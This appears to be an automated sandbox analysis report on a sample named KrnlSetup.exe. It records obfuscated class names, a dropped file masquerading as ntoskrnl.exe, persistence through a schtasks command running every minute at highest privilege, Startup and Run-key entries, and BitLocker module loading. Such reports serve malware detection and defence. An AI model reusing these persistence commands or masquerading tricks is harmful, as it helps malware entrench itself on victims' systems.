                                    Source: KrnlSetup.exe, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.csHigh entropy of concatenated method names: 'j76x5cLmB9LJrX9gnQ3nPctoiYMJzEb8WzToQH0ce1ybtfsupf5', 'Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg', 'zHewPP1L1NqsTfXWiPld4GOToBF2WwWhTYUXIBVT6v7Dct5cV4s', 'nW4qlZyEmawgqXC4yKi7l6EeUekhzgP0WYb3eDx08cohx3isXpf', 'GRfd9kgsYdlhf1E9iGyU2FGFIc4oBcwCeaRapsVwu5su70lPuJv', 'NjqdUp2RuRjQrhOlahUOpHoIbRl5tzE1NYjAvoDCzurgfNbAbVY', 'Rx7zgxy6oA5wj1yjHmoDo3uwMiX0Ar1BmLd9QAB8I0njaLzUGtA', 'F9gA5Gopk65n2sUHkLQ0wAkK0oXU3tcTwVzjRMkTrjgnv040SGL', 'uekCHoqlgFjYRjdhwC4SqRj8LTcwldU7Ml5NEXwyLvWlY27izys', 'KYaKXX5APHkvkOXvN8LwOis5lhW01H2zhM5AfVlUjyd69ek8JJZ'
                                    Source: ntoskrnl.exe.0.dr, tASLOpZvl7GGRJYWR4yIssW5kl.csHigh entropy of concatenated method names: '_7ssMBjEKbahFh3EoLQhI7V3fxT', 'IrPPxYwUhykeHZLyQHxJvo4mk0', 'hXgmLcmUofQeGwBxl47jkEk7BJ', '_9VF7gkkkTnq68qDA6LFTfJXoMN1WdDcGh205zycGb1LFckg9elhljtalKdfPYBqviFtXSgPWCC6cC7', 'IYZZN37JjyxjpV4hFnvoUKnJBIyEkMbVxOb1kxCTB0owlsyHMVnABlvx7CeAQKyTE9ej93emQ3l0YW', 'uiOIRcaMOND9Q1dqvNWA8B25lCIht1T4SteHBcmeFBaBdEggFFz5dK2JwGTUPXmMn0FtEbQbJpOqT1', 'paGaBerULx3vQuVa8ni2PhN6mO4xhNmS4mwEKBupiWdEFyW3jrLuQsynSnMwk63mENIhw3XoBwElbJ', 'JmGf0iehP7BRsB5GmcZL9NMlIrG0Drpyh1rmCm9ofeyUk10SNojjBdlerbL3yq7AZOaXSDfXsKp0aE', 'HkxSSRe4zmsdVH6SeuietRGiWooRix4icowlAyr3MpZYlHcaXUnQJrJyryzfgay8tQEAVnrW0cbBGq', 'E13gGu54ryvNILSdZ09LhjcTUPvW0hZzAVK17F8XMNTH3YGPpipRvXyOUn40cSjm5y4PgUB3RGuZj5'
                                    Source: ntoskrnl.exe.0.dr, nprLFn5VDgwLiydlUclf74GcDHt5ZA2Cm.csHigh entropy of concatenated method names: 'sikTj4Sabcae10kVCtmOsj21C8R3ET0y4hXzMlGUdjU', 'F51TEnYgWJkMTWdtDT9rvhyduzKP0VIU2IBoaWnDXhL', 'Zg6HONjk3u3JP3RRn0QDL1gDrtCkhRDYeuvroY9jpjv', 'Hg1lEVv05lei546bFSAA7AR1dV1aNfYpuZtMSf8aHt2'
                                    Source: ntoskrnl.exe.0.dr, cYX3OVhpLcA6pdQrK6x1pst8eZqf4OHXsSZvSKZX5QjcDyvssaTBTBt6QsMiumjxTz1UegqCK2fu4L22QvQnJFxcwLF.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'ZGODKwtqkVbl63Si4J0b2IaskUEMLkfXUV1iqqMMxP1', '_96N0MdkYcRl39KtkJ0RIZmhL5BF7iZPKwPhtiY5yvz1', 'HcFxIT6VBJ0H2ApcxRgUD7DLuDNF1LQp8Txz1cJ0R6R', 'NwNozcGMHIOB8u8pTRepwD56kki98CuKR71BTWAXLIk'
                                    Source: ntoskrnl.exe.0.dr, T7zN2WrNpXmAXLfgM7TXONhebqdgyAdGfM8w47JTuVvJD3Frs3D47tuxipr2N9Fi0U.csHigh entropy of concatenated method names: 'pSD1lTqKZN7Sl6F073o5tcR2PxeiIFvKDhf3anKtyOAOmhTtSU6rBDZYJMNT5u0hVZ', 'veIZW0otddqoNKMbpvtqYGXIxXSSfF2hoTf9RbKFoAjHoM5OMtMWA1xNssME7o23Pi', 'gRbeiKLTfmcejQa1OqWejXIQUXvEnYRL46vrE3Wl3rljyuGEWuY3tLymgOUYNga9OD', 'Issh3FdMrPAdzw6kcdXr9tiwq3C5FPnsy5JvMlQ2oLQHCD1IHkqTLwsKFEJqL1TnOs', 'p2RhKecevXMbvidAAjsCf30k2rMzxwYB6tsxuf2eY4WWV9oXTeHbHEkNQQzhNRKO9p', 'FM1yLqYdQXX2BoXnIHpdzmJELCtu2Jay7ertowYpif535YkTaa31rlQhn8iaYTWLTW', '_5XPWgRAWsQZ36DdryyJuoq2LFS7S8SHUtFVUVaTX25fBj0QRfmAZabD3IS3DWvDpEx', 'mTjgvlSX2fRy8UMAAhPWUKg8HbaRUFx7WeaJdNC6sJrO6mNo4px7LY8L04IiIEelms', '_9dpsXVdx9VWhNQ1wYPFXwXyfXhxgjtn6S1DFo4B9phXPumFhvcrgc1RENXk5m116t7', 'adPkIZkUvgKz0ds1tzEtJea9zaVNbvPPUOI1fYAHquC4K2zlKZEgM5l3xd97w1ceLG'
                                    Source: ntoskrnl.exe.0.dr, plgxVns32E432OP91wDLjvcriYG7qgPnLar39J7oUOj4gvPqT27.csHigh entropy of concatenated method names: '_5geOxBePcHi8fC3aDPbGoQ6JtzoLVCrhtafghF2u2uHEar2WFdE', 'VCSM48aD5KtdYb8bOBImpC2j67UwJ3L33joXl3uP7jgt0fBPEt24KtUTIEnXEv8uQu232OWH1MPpu1BbUta', 'Xdswxyqchr8KZ3sBmxHCbSAymEkKV5ov5FMM9nZAVownMzQHWuTb6dmzVCmR8hhfi274cl02yvfOaiTLy8T', 'LhIjSlMgRdBXIPsGX4MiqT9xh9YiwppQTd9PaXhfylx6DXrhq3nuvsCkIXnKss6SHtMaOh7yeacf2YhHgZL', '_5VRbpqAFTaQgm51y5QtkvW2Tm4fwJa6s8OlTN0XpGqCOtb2JfIzW7M4S794fopRJ1b0P4qgD4HFKl2AYXRQ', 'OD3xGY99UgG1dmE9G4PZeRSFLoWN3XX4X05VdkjxPNZtZVApgm4ZCU5Mvv178NR8BlYO4giVUqvZyp13TAO', 'pvYh3zjNVGQro5CnRnILLZbBXDddYhuK3kHq4QxJ70h4ZFDC0qWQ7LFpSSunFUVuGK4dOcX0kTyBLv0lopk', 'RZXwniU96hv3hM9UHDsgsLgipirp55Y2B5n9Gvni4lpki5WQSxstgqKdPRPnKfyt3AvfE6dmsu9pCM3chy5', 'g7rRJdbz0J6MnjLshSoaycTk6kXjmskFcq2JX1lQdSZ9TwNw9Tfz8zBanGTrZOgjT4gDPyhsiG84PCUy0Ak', 'SRm1sY9zI7wr8DtStICAoYyCJiCEVwXt8JtnSM8YSbS4aO4ZSvdB9fpMIPtL9eYOQzwnSOcnwnVtJHv00oj'
                                    Source: ntoskrnl.exe.0.dr, OKwK7LhbT17LhFoV8nXoqDfY9C.csHigh entropy of concatenated method names: 'fZOkXT9QaQHEDxtpWtGtE5Zp0c', 'ODSElTfgUgNnpNWJYarXYD2LGCpS6k8k8tDwtnjVEgFSBGA88V9xAB3iRrnM4OyzgiLSBIya4tQjDo7MiJAv6Ob5s2GN4', 'BvCqdj21pcOuqP2KqeHnk9mnkQZazPaXzqBLtEsNRF7ckxBzV8ctV2zwWGobDLw10K47T266LDMOTtaBk1AVbqxniFBik', 'kTZC3zUk9yV2Lg94BFRKKkWVecaOlzcCA71elt9PtZ9DjS7qmpoimxP1BMwy56wpQddwmtgdmT7zmiNN04p26tdPpBigY', 'ZCYtJZr3a6i7mWNP8wU95OaeldFhQbSKoFcUeYCjUduxeruKjeYJIZGdBZz4yu4LnKxt6p2SRBjY8BrdECELJXLbhYHtB'
                                    Source: ntoskrnl.exe.0.dr, 68QERigio3OYDoczrnvFbx6mMZ.csHigh entropy of concatenated method names: 'cw1Ye58i3sEWiVbc7pm0Ea6TMg', 'GbqXPEy94PYWQcuTw5tcq564CV', 'rLspw77oxv1WXq1PytR5dn7QHx', 'zaHEgI74aLxoj9n5UKM9E8vDZ3', 'nhzNzUjKDt3FkWychg4sePDkSxLPPUxChvFNhYTK0susVTuNWlwLhmwPQGoyj', 'ZFu5YMSYHc4IGdp2pdgdtfSWSIHMYQFippvBk8M1BcebkWB0CfMDxOT0kFTHJ', 'G8y8C1BCYxs7NfNc5IXA4o340lAfA2zsBpE4koXcEqxoI4vGcIhKaz77Y4YcP', 'w5PXLvTZa7GwEqkRyJ5T63IW6IMVxypAdgg0zmjttP7RvRAE8hKavpBoD2IDy', 'S76gv8uCSBTOueaICU6xRdIv1JcZVjT9tlMBT3lbPx2G6EE3K3StMW4XiVohN', 'NBWKErPt2cVkpKVJckBt7gD0eDiYGkPMUHWCGbcxDLVszKv6wQ9xx0uUN0A5R'
                                    Source: ntoskrnl.exe.0.dr, Wrga4JIQ161v6uXdIAXYuLFcsRxfHujcE.csHigh entropy of concatenated method names: 'mzIauuQBhkC9t2jnlCZuTs22XJLUZbLm9', 'gKdsa7JiZ3xDKfLcvjFqHz1rG8SgxCkaa', 'xqOQZ2IF8DwRVIGCGGnw0ZVwE7vFC4VdPzmZ4NU2Yn2kacyDPp0BPqUf47AyobOH5a', '_2Fi7imDL4I9JOwMaJXO43BvOt8ONDW3yJIDP2Y8FUpoMEnUvQ97OJusun6QLpUkj1l', 'dhH6NTfipeUhM26Uu5piVb3kCPW7apHORRSBOXHfSHXS2USBlpXUDvvHAfSfHOSd6S', 'bJMAYNQLKlBduycg3sfNzdUT5pbsDcxMEeCgcDYuod9YZ0ARw3wtxDja2SzYNMeefL', 'xfOecYlHAAD1l0jYPDSG7Ej0zVGWClcyxVLKVSu0iemzghnLzqrlTr088dEZPPbM9C', 'zW9DSk7mQCz6uQtxIrBpIweMaJrgK7pZD3IjnQuSAzALZmfxcatpVUycGU2WdYzthV', '_2UJlUmzj3wBM5EzW7frus5d7Agz0BtCJhmOMkhGKWIqkIbSPlsOcJmqTr22RpMyGI2', 'jO5DYzjOX2qOtl50autwA0LbD8sMeqQbSe2FsApjcowDmahBPpUmAJgnjihTJt5ZzX'
                                    Source: ntoskrnl.exe.0.dr, LVwmQO4ax5JB4YFwVVHn5TmiZFyNcjVYW0Nn6PzcPuLC6TmagDM.csHigh entropy of concatenated method names: 'cupxcXiwCuW6tLuxq8WwSNNLIqMRP8rlGwPNdf5vdAT1llg4sCl', 'On7be7edBqgbpw6N9bHwPdt21xUwbUTreGWLAoCaosbs8uEBtO9', 'bL60cWrHdLNg6I2I2Rz24YWL66CBUGrpUvfVdnIC6TEZu3A5dUf', 'TOELTNpx29aY8smfulV6lI5BrOZK', '_9h6z2STmyr7oL17GmG13d7NakwSf', '_2c8IdUkgIMK5Wrkgbxp1McxANSJJ', 'nb3SoW2ayJjaF15EJEBS8bqB83b9rePv1a0RNejrK3khxIsUAxt7hTEX83tMM', 'CzjfK39LMMval6SShzajFiA7oROasO1R5yXpY7LDDOzXB4SvzP1jVWBvtDuOz', 'wrHbHPnx4r0zjoYis8DL9o09NLuVYvcxRLSy9qDwWOeSIPqnBLikrk5ac9o8d', 'mZnzDDWxhtU5TLvIhrm2sKbXhhRvI2zPn7kiqb4HO3O5w20eqalujaEH60uyB'
                                    Source: ntoskrnl.exe.0.dr, FRsOn8xOk3xCVaucFsv91X3lefmoZdYvqD2xretC1VQ8E9yENMe.csHigh entropy of concatenated method names: 'xk7cdZedBDWBNQZFjkeYPuOfswvNWwKnaFyJEonKvxY1XZ7OnAl', 'IvIHTMylshoeX2w4QRIhyvmYu8os', 'ltIKBIggk1XTA3ijsjErkHA5EGRY', '_4KrPj7q2XCofasrLwFUvb2vgyoBQ', 'ol7IHUZAmIlurJKjy9e1MPwupAx0'
                                    Source: ntoskrnl.exe.0.dr, ZErofTOG7QyG2YqbzUeXCBXVgf.csHigh entropy of concatenated method names: 'uqKcLujo4ElgykH6ucSurssHoQ', 'Ovpbp5SkP6IKQ6E84Cm7rNmZij', 'fPl9sBA37MajH1ICUw3Ruok72s', 'SqaN5V8tXYmbgHpJ3wM5qEBDxB', '_4kVsLRnHFqrPhizEZ0HAgrobQl', 'gp6JKIii99RWPnt4TkKrMv5Tyw', 'RC2hydMiTzBiRbxRytYxATgJaH', 'jWphB5eHWngplbKwXBiEAzEkuG', 'jsOllqZzRJTQBMFBNmyD7rvTFh', '_9YaVQWshVMjgacH70h0sx1MXyX'
                                    Source: ntoskrnl.exe.0.dr, VWGtWyAG0PD77sgVWRYqiYMleUlEG7rGwrGlSRxFcAKsRkZ4e6K.csHigh entropy of concatenated method names: 'j76x5cLmB9LJrX9gnQ3nPctoiYMJzEb8WzToQH0ce1ybtfsupf5', 'Aeazd6GI8VHwcZLZirW6YjpAWBpfjdSdVZw8GtbqjBu90FpExbg', 'zHewPP1L1NqsTfXWiPld4GOToBF2WwWhTYUXIBVT6v7Dct5cV4s', 'nW4qlZyEmawgqXC4yKi7l6EeUekhzgP0WYb3eDx08cohx3isXpf', 'GRfd9kgsYdlhf1E9iGyU2FGFIc4oBcwCeaRapsVwu5su70lPuJv', 'NjqdUp2RuRjQrhOlahUOpHoIbRl5tzE1NYjAvoDCzurgfNbAbVY', 'Rx7zgxy6oA5wj1yjHmoDo3uwMiX0Ar1BmLd9QAB8I0njaLzUGtA', 'F9gA5Gopk65n2sUHkLQ0wAkK0oXU3tcTwVzjRMkTrjgnv040SGL', 'uekCHoqlgFjYRjdhwC4SqRj8LTcwldU7Ml5NEXwyLvWlY27izys', 'KYaKXX5APHkvkOXvN8LwOis5lhW01H2zhM5AfVlUjyd69ek8JJZ'
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\ProgramData\ntoskrnl.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\ProgramData\ntoskrnl.exeJump to dropped file
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KrnlSetup.exe.logJump to behavior

                                    Boot Survival

                                    barindex
                                    Uses schtasks.exe or at.exe to add and modify task schedules
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "ntoskrnl" /tr "C:\ProgramData\ntoskrnl.exe"
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnkJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ntoskrnl.lnkJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ntoskrnlJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ntoskrnlJump to behavior

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Loading BitLocker PowerShell Module
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\EF8C18E803B11A27265E 9BCF8DFC92BC643B9414A446DA4632050DE1B7577FEDF4F7711D3B4B3D46E06DJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Users\user\Desktop\KrnlSetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
